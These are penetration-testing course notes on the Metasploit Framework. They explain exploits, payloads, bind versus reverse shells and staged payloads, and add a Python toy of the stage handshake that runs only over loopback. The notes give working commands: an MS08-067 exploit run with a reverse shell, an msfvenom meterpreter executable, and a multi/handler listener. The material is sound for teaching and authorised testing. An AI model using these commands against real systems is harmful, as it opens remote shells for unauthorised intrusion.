Source: "Advanced Penetration Testing" Cybrary
Metasploit Framework
*Exploitation framework
*Written in Ruby
*Modular: exploits, payloads, auxiliaries, and more

Terminology:
*Exploit: the vector for penetrating the system
*Payload: shellcode; what you want the exploit to run on the target once it succeeds
*Auxiliary: other modules such as scanners and information gathering (they carry no payload)
*Session: the connection established by a successful exploit

Interfaces: Msfconsole, Msfcli, Armitage
Utilities: Msfpayload, Msfencode, Msfupdate, Msfvenom
(Note: msfcli, msfpayload and msfencode were retired from the framework in 2015. Msfvenom replaces msfpayload and msfencode, and msfconsole -x "..." or a resource script replaces msfcli. The examples below are kept as the course presented them.)

Traditional vs. Metasploit
Traditional exploit:
*Find a public exploit
*Replace offsets, return address, etc. for your target
*Replace the shellcode
Metasploit:
*Load the Metasploit module
*Select the target
*Select the payload

Metasploit Payloads
*Bind shell: opens a listening port on the victim machine; the attacker connects in
*Reverse shell: the victim connects back to the attacker; the better choice through NAT and egress filtering
*Inline (single): the full payload is in the exploit
*Staged: a small stager calls back to the attacker to fetch the rest of the payload
Naming convention: a slash between stage and stager means staged (windows/shell/reverse_tcp), an underscore means inline (windows/shell_reverse_tcp).

Msfcli [command line option]
*O = show options
*P = show payloads
*E = run exploit
E.g.,
$: msfcli windows/smb/ms08_067_netapi RHOST=10.0.0.101 PAYLOAD=windows/shell/reverse_tcp LHOST=10.0.0.100 E

Msfvenom
Make shellcode and standalone payloads
*-l list modules
*-f output format
*-p payload to use
E.g.,
$: msfvenom -p windows/messagebox TEXT="Hello World" -f exe > test.exe

Multi/Handler
*Generic payload handler
*Catches payloads started outside of the framework, such as a standalone msfvenom executable
Generate the executable, then start the handler with the matching payload, LHOST and LPORT before running it on the target:
$: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.190 LPORT=1337 -f exe > meterpreter.exe
msf> use multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.0.190
msf> set LPORT 1337
msf> exploit
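To make the bind vs. reverse and inline vs. staged distinctions concrete, here is an added example (not part of the course notes or Metasploit itself) that models the staged TCP handshake multi/handler performs with a stager: the connecting side sends nothing, the handler side pushes a 4-byte little-endian length followed by the stage, and the stager reads exactly that many bytes, mirroring the length-prefixed stage transfer Metasploit's TCP stagers use. The reverse variant has the victim connect out to the handler; the bind variant has the handler connect in to a port the victim opened. FAKE_STAGE is a constructed byte string, not real shellcode, and nothing is executed; everything runs over loopback on ephemeral ports.

```python
"""Toy model of a staged TCP payload handshake (added example, not Metasploit code).
reverse_tcp: the attacker listens (multi/handler) and the victim connects out.
bind_tcp:    the victim listens and the attacker connects in.
In both cases the handler pushes <u32 little-endian length><stage> and the
stager reads exactly that many bytes. FAKE_STAGE is a constructed stand-in."""
import socket
import struct
import threading

# Constructed stand-in for the second stage a staged payload fetches. For
# windows/meterpreter/reverse_tcp the real stage is the meterpreter DLL; an
# inline payload would instead carry all of this inside the exploit itself.
FAKE_STAGE = b"STAGE:" + bytes(range(256)) * 4  # 1030 bytes


def recv_exact(sock, n):
    """Read exactly n bytes or raise; a real stager loops on recv the same way."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("stage truncated at %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def push_stage(conn, stage):
    """Handler side of the handshake: length header, then the stage body."""
    conn.sendall(struct.pack("<I", len(stage)) + stage)


def pull_stage(conn):
    """Stager side: read the length header, then exactly that many bytes."""
    (n,) = struct.unpack("<I", recv_exact(conn, 4))
    return recv_exact(conn, n)


def listen_on(host):
    """Bind an ephemeral loopback port so the demo never collides with a live handler."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    return srv


def run_reverse_demo(lhost="127.0.0.1"):
    """reverse_tcp: attacker listens on LHOST:LPORT, victim connects back.
    Returns the stage bytes as the stager received them."""
    handler = listen_on(lhost)
    lport = handler.getsockname()[1]

    def handler_thread():  # this is what 'use multi/handler' + exploit does
        conn, _ = handler.accept()
        with conn:
            push_stage(conn, FAKE_STAGE)

    t = threading.Thread(target=handler_thread, daemon=True)
    t.start()
    # Victim side: the stager connects out and pulls the stage.
    with socket.create_connection((lhost, lport), timeout=5) as victim:
        stage = pull_stage(victim)
    t.join(5)
    handler.close()
    return stage


def run_bind_demo(rhost="127.0.0.1"):
    """bind_tcp: victim opens a port and waits, attacker connects in.
    Same handshake in the opposite direction, which is why bind shells fail
    behind NAT and inbound filtering while reverse shells usually get out."""
    victim = listen_on(rhost)
    rport = victim.getsockname()[1]
    result = {}

    def victim_thread():
        conn, _ = victim.accept()
        with conn:
            result["stage"] = pull_stage(conn)

    t = threading.Thread(target=victim_thread, daemon=True)
    t.start()
    # Attacker side: connect to RHOST:RPORT and push the stage.
    with socket.create_connection((rhost, rport), timeout=5) as attacker:
        push_stage(attacker, FAKE_STAGE)
    t.join(5)
    victim.close()
    return result.get("stage")


if __name__ == "__main__":
    print("reverse_tcp stage delivered:", run_reverse_demo() == FAKE_STAGE)
    print("bind_tcp stage delivered:   ", run_bind_demo() == FAKE_STAGE)
```

The point to take from the model is that a handler is only useful when it speaks the same stager protocol as the payload that was generated, which is why multi/handler must be told the exact PAYLOAD, LHOST and LPORT that were baked into the msfvenom output: an inline payload never performs this second exchange and would hang a handler waiting to push a stage.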
Author: Vitali Kremez
July 2016